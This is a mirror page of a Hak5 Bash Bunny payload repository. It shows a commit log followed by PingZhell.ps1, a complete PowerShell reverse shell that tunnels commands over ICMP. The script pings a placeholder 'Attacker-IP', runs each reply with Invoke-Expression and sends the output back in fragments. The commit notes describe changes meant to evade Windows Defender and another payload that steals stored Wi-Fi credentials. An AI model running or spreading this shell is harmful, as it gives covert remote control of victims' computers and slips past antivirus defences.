mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
b64503fe23
* Uploaded ReverseBunny
Obfuscated reverse shell via powershell
* Uploaded WifiSnatch
Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇
* Update ReverseBunny.txt
Changed payload to evade Windows Defender
* Update payload.txt
Added new "Eject Method" - props to Night(9o3)
* Update README.md
* Deleted ReverseBunny.txt
Deleted because of higher risk to get caught by AV
* Updated ReverseBunny to version 1.2
Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design
* Updated ReverseBunny to version 1.2
Updated README for ReverseBunny update
* Updated payload
fixed some stupid left overs <3
* Uploaded pingUinBunny
a reverse shell using icmp
* Delete payloads/library/remote_access/switch1 directory
* Uploaded pingUinBunny
A reverse shell using icmp
* Update README.md
* Update README.md
* Updated to PingZhell
* Update Bunny.pl
* Update README.md
* Update README.md
* Update payload.txt
* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl
* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md
* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt
* Update payload.txt
* Update README.md
* Update README.md
* Update Bunny.pl
87 lines
3.7 KiB
PowerShell
87 lines
3.7 KiB
PowerShell
|
|
<#
|
|
|
|
Original script by nishang - modified by 0iphor13 for PingZhell
|
|
|
|
Use bunny.pl as a master
|
|
|
|
When running the master, don't forget to disable ICMP replies by the OS. For example:
|
|
$: sysctl -w net.ipv4.icmp_echo_ignore_all=1
|
|
Then:
|
|
$: perl bunny.pl
|
|
|
|
Microsoft please don't block, oh dear microsoft corporation
|
|
#>
|
|
|
|
|
|
$IPAddress = 'Attacker-IP'
|
|
$Delay = 5
|
|
$BufferSize = 128
|
|
|
|
#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
|
|
$ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
|
|
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
|
|
$PingOptions.DontFragment = $True
|
|
$MicrosoftCopyright =@"
|
|
_______ ___ __ _ _______ _______ __ __ _______ ___ ___
|
|
| | | | | | | | | | | | | | |
|
|
| _ | | |_| | ___|____ | |_| | ___| | | |
|
|
| |_| | | | | __ ____| | | |___| | | |
|
|
| ___| | _ | || | ______| | ___| |___| |___
|
|
| | | | | | | |_| | |_____| _ | |___| | |
|
|
|___| |___|_| |__|_______|_______|__| |__|_______|_______|_______|
|
|
|
|
|
|
Windows PowerShell running as user $env:username on $env:computername `n
|
|
"@;
|
|
|
|
# Copyright Copies Right
|
|
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
|
|
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
|
|
|
|
#Does a german penguin just PingUin?
|
|
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
|
|
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
|
|
|
|
while ($true)
|
|
{
|
|
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
|
|
$reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
|
|
|
|
if ($reply.Buffer)
|
|
{
|
|
$response = ([text.encoding]::ASCII).GetString($reply.Buffer)
|
|
$result = (Invoke-Expression -Command $response 2>&1 | Out-String )
|
|
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
|
|
$index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
|
|
$i = 0
|
|
|
|
#Fragmant larger output into smaller ones to send to the server.
|
|
if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
|
|
{
|
|
while ($i -lt $index )
|
|
{
|
|
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
|
|
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
|
|
$i +=1
|
|
}
|
|
$remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
|
|
if ($remainingindex -ne 0)
|
|
{
|
|
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
|
|
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
|
|
}
|
|
}
|
|
else
|
|
{
|
|
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
|
|
}
|
|
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
|
|
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
|
|
}
|
|
else
|
|
{
|
|
Start-Sleep -Seconds $Delay
|
|
}
|
|
}
|